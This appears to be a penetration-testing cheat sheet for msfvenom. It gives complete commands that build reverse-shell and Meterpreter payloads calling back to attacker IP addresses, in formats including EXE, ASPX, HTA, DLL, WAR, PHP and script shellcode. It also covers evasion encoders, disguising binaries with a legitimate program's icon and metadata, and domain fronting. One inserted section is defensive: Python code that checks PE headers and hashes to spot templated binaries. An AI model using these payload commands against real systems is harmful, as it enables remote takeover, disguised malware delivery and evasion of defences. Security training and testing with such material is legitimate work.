Backlink: reference-notes-readme


Command Example

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.172 LPORT=443 EXITFUNC=thread -f aspx -o iistest.aspx

General Flags

Encoders

-e x86/shikata_ga_nai

-e x64/zutto_dekiru

Templates

Use an .exe saved locally as the template with -x. The output keeps the template's icon (thumbnail image), version metadata, etc.

-x notepad.exe
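Because a templated binary carries the original program's icon and version info, its name and appearance say nothing about provenance. The following is an added defender-side example, not part of these notes and not tool code: a minimal PE header reader that pulls out the fields a triage script actually compares (machine type, link timestamp, DLL flag, whether a Certificate Table entry exists) and the SHA-256 for matching against a vetted copy. The sample PE images are constructed inline (header-only, not runnable programs); the field offsets are the standard PE32/PE32+ layouts.

```python
import hashlib
import struct

# Added example, not part of these notes: a minimal PE header reader for
# triaging a binary that looks like a known program (icon, version info) but
# may have been built from it as a template. Metadata is cosmetic; the fields
# below, and above all the hash, are what a triage script compares.

MACHINES = {0x14C: "x86", 0x8664: "x64"}   # IMAGE_FILE_MACHINE_I386 / _AMD64


def pe_summary(data: bytes) -> dict:
    """Return machine type, link timestamp, DLL flag, Certificate Table
    presence and SHA-256 for a PE image (raises ValueError if not PE)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    # COFF file header: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, _nsec, stamp, _, _, _opt_size, chars = struct.unpack_from(
        "<HHIIIHH", data, pe_off + 4)
    opt_off = pe_off + 24
    magic = struct.unpack_from("<H", data, opt_off)[0]
    if magic == 0x20B:       # PE32+ (64-bit)
        ndd_off = 108
    elif magic == 0x10B:     # PE32 (32-bit)
        ndd_off = 92
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    ndd = struct.unpack_from("<I", data, opt_off + ndd_off)[0]  # NumberOfRvaAndSizes
    cert_size = 0
    if ndd > 4:  # data directory 4 is the Certificate Table (Authenticode)
        _cert_off, cert_size = struct.unpack_from(
            "<II", data, opt_off + ndd_off + 4 + 4 * 8)
    return {
        "machine": MACHINES.get(machine, hex(machine)),
        "timestamp": stamp,
        "is_dll": bool(chars & 0x2000),            # IMAGE_FILE_DLL
        "has_certificate_table": cert_size > 0,    # presence only, not validity
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def matches_known_good(data: bytes, known_good_sha256: str) -> bool:
    """The decisive check: the file is what it claims only if it hashes to a
    vetted copy of that program. Identical icon/version info proves nothing."""
    return hashlib.sha256(data).hexdigest() == known_good_sha256.lower()


def build_sample_pe(machine: int, stamp: int, cert_size: int,
                    pe32plus: bool = True, is_dll: bool = False) -> bytes:
    """Constructed test data: a header-only PE image (no code, not runnable),
    just enough structure for pe_summary() to parse."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                     # e_lfanew
    opt_size = 240 if pe32plus else 224                       # 16 data directories
    chars = 0x0022 | (0x2000 if is_dll else 0)
    coff = struct.pack("<HHIIIHH", machine, 1, stamp, 0, 0, opt_size, chars)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    ndd_off = 108 if pe32plus else 92
    struct.pack_into("<I", opt, ndd_off, 16)
    cert_off = ndd_off + 4 + 4 * 8
    struct.pack_into("<II", opt, cert_off, 0x1000 if cert_size else 0, cert_size)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


# Two constructed samples: a 64-bit image with a Certificate Table entry and a
# 32-bit image without one.
SAMPLE_WITH_CERT = build_sample_pe(0x8664, 1600000000, 4096)
SAMPLE_NO_CERT = build_sample_pe(0x14C, 1600000000, 0, pe32plus=False)

if __name__ == "__main__":
    for name, blob in (("with-cert", SAMPLE_WITH_CERT), ("no-cert", SAMPLE_NO_CERT)):
        print(name, pe_summary(blob))
```

A present Certificate Table only means a signature blob is attached; whether it still validates after the file was modified has to be checked with the platform's signature tools (for example Get-AuthenticodeSignature in PowerShell). The hash comparison against a known-good copy is the check that decides the question.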

Available Payloads

Windows

Payloads

Note: payload names containing x64 are 64-bit; those without it are 32-bit.

windows/shell_reverse_tcp

windows/x64/shell_reverse_tcp

windows/meterpreter/reverse_https

windows/x64/meterpreter/reverse_https

Formats

Compiled

EXE: -f exe -o test.exe     A directly executable binary.

ASP: -f asp -o iistest.asp     Mostly used for IIS web servers.

ASPX: -f aspx -o iistest.aspx     Also mostly used for IIS web servers.

HTA: -f hta-psh -o file.hta     An HTA file sent to an end user runs if they open it.

DLL: -f dll -o file.dll     Used when implementing DLL injection.

Raw

C#: -f csharp     Used to embed the shellcode in C# code, usually when building a malicious DLL or binary in Visual Studio and then converting it with DotNetToJScript.

PS: -f powershell     Used when placing the shellcode directly in a .ps1 script, usually with a macro runner.

Linux

Payloads

linux/x86/shell_reverse_tcp

linux/x64/shell_reverse_tcp

linux/x64/meterpreter/reverse_tcp

Formats

ELF: -f elf -o file

Script Language Payloads

Python

msfvenom -p python/meterpreter/reverse_https LHOST=192.168.49.205 LPORT=443 -f raw > met.py

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.pl

Java

Payloads

java/jsp_shell_reverse_tcp

Formats

WAR: -f war > shell.war

JavaScript

Payloads

linux/x86/shell_reverse_tcp

windows/x64/shell_reverse_tcp

Formats

JS_LE: -f js_le -e generic/none     (CMD=/bin/bash is a payload option, set alongside LHOST/LPORT; see the command example below)

Command Example

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.119.205 LPORT=443 CMD=/bin/bash -f js_le -e generic/none

PHP

Payloads

php/shell_reverse_tcp

Formats

PHP: -f raw > shell.php


Domain Fronting

msfvenom -p windows/x64/meterpreter_reverse_https HttpHostHeader=cdn123.offseccdn.com LHOST=good.com LPORT=443 -f exe > https-df.exe

The above probably isn't useful anymore: Azure, the only cloud provider that still supported this type of attack, killed it in March 2021.